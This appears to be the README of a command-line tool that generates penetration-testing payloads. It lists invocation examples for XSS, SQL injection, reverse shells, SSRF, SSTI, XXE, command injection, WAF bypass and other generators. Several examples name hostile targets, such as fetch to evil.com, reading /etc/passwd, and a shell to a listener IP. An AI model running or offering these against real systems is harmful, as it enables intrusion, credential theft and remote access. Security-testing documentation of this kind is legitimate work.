Generate security testing payloads from your terminal
`npm install -g payload-playground` — then use `payload` anywhere.
`npx payload-playground xss` — no installation required; runs directly.
# Quick-start examples. Each command only prints a payload string to stdout;
# the CLI itself executes nothing, reads no files and makes no network requests.
# Generate an XSS payload
payload xss
# SQL injection for PostgreSQL
payload sqli -d PostgreSQL -g version
# Reverse shell — -i/-p describe the tester's own listener, not a target host
payload revshell -i 10.10.14.1 -p 4444
# List all generators
payload list

Generators (id — name — description — example):
- xss — XSS — Cross-Site Scripting — `$ payload xss -t script -s "fetch('//evil.com')" --encoding base64`
- sqli — SQLi — SQL Injection — `$ payload sqli -d PostgreSQL -g version`
- revshell — Reverse Shell — Shell one-liners — `$ payload revshell -i 10.10.14.1 -p 4444 -s python3 -e`
- ssrf — SSRF — Server-Side Request Forgery — `$ payload ssrf -t aws`
- ssti — SSTI — Template Injection — `$ payload ssti -e Jinja2 -t rce -c "id"`
- lfi — LFI — Local File Inclusion — `$ payload lfi -w php-filter --depth 8`
- xxe — XXE — XML External Entity — `$ payload xxe -t oob --oob-server http://burp.collab.net/`
- cmdi — Command Injection — OS command injection — `$ payload cmdi -c "cat /etc/passwd" -s "|" -b ifs`
- file-upload — File Upload — Malicious file upload — `$ payload file-upload -s jsp -b double-ext`
- redirect — Open Redirect — Redirect payloads — `$ payload redirect -u https://evil.com -t at-sign`
- cors — CORS — CORS misconfiguration — `$ payload cors --target https://victim.com -t null-origin`
- nosql — NoSQL Injection — NoSQL injection — `$ payload nosql -t data-extraction -d MongoDB`
- jwt — JWT — JWT manipulation — `$ payload jwt -t algorithm-confusion -s "secret123"`
- proto-pollution — Prototype Pollution — Prototype pollution — `$ payload proto-pollution -t constructor -p isAdmin -v true`
- crlf — CRLF Injection — CRLF injection — `$ payload crlf -t response-splitting -e url`
- graphql — GraphQL — GraphQL attacks — `$ payload graphql -t deep-nesting --depth 10`
- xpath — XPath Injection — XPath injection — `$ payload xpath -t boolean-blind -f username`
- ldap — LDAP Injection — LDAP injection — `$ payload ldap -t blind-extraction -a uid`
- smuggling — HTTP Smuggling — Request smuggling — `$ payload smuggling -t te-cl --path /admin`
- csrf — CSRF — Cross-Site Request Forgery — `$ payload csrf -t fetch -u https://target.com/api`
- waf-bypass — WAF Bypass — WAF bypass techniques — `$ payload waf-bypass -t encoding -w cloudflare`
- idor — IDOR — Insecure Direct Object Ref — `$ payload idor -t uuid-prediction --id 1000`
- race-condition — Race Condition — Race condition exploits — `$ payload race-condition -t double-spend -c 50`

When output is piped, the CLI emits raw payloads without color codes, which makes it suitable for scripting and for chaining with other tools.
# Scripting examples. The CLI only writes payload text to stdout, so it composes
# with ordinary redirection and pipes.
# Save to file
payload xss -t script > payloads.txt
# Base64 encode a reverse shell (the revshell generator's own -e/--encode flag
# produces the same Base64 encoding without the extra pipeline stage)
payload revshell -i 10.10.14.1 -p 4444 | base64
# Generate payloads in a loop — one CLI invocation per template engine;
# "$engine" is quoted so each value is passed as a single argument
for engine in Jinja2 Twig FreeMarker ERB Mako; do
echo "=== $engine ==="
payload ssti -e "$engine" -t rce -c "id"
done
# Multiple XSS variants — >> appends, so re-running the loop adds duplicate
# lines to xss-payloads.txt rather than replacing the earlier run's output
for tag in script img svg iframe; do
payload xss -t "$tag" >> xss-payloads.txt
done

Every generator supports `--help` for detailed usage:
# Per-generator help; the option sets differ between generators (see below)
payload xss --help
payload sqli --help
payload revshell --help

Options for `payload xss`:
- -t, --tag — 9 HTML tags
- -e, --event — 5 event handlers
- -s, --script — Custom JS code
- --encoding — none, url, html, base64

Options for `payload sqli`:
- -d, --db — MySQL, PostgreSQL, MSSQL, Oracle
- -g, --goal — 9 attack goals
- -u, --union-cols — UNION column count
- --table, --columns — Data dump targets

Options for `payload revshell`:
- -i, --ip — Listener IP (required)
- -p, --port — Listener port (required)
- -s, --shell — 11 shell types
- -e, --encode — Base64 encoding

Options for `payload ssrf`:
- -t, --target — AWS, GCP, Azure presets
- -b, --bypass — 8 bypass techniques
- --protocol — http, https, file, gopher, dict
- -h, --host / -p, --port — Custom targets

The CLI is a pure string generator — it never executes commands, reads files, or makes network requests.
commander and chalk